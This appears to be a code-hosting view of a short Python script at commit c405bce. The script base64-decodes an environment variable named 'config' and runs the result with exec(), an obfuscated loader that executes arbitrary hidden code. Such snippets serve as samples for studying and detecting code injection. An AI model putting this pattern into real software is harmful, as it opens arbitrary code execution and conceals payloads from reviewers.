c405bce
1
2
3
4
5
import os import base64 config = os.environ['config'] exec(base64.b64decode(config))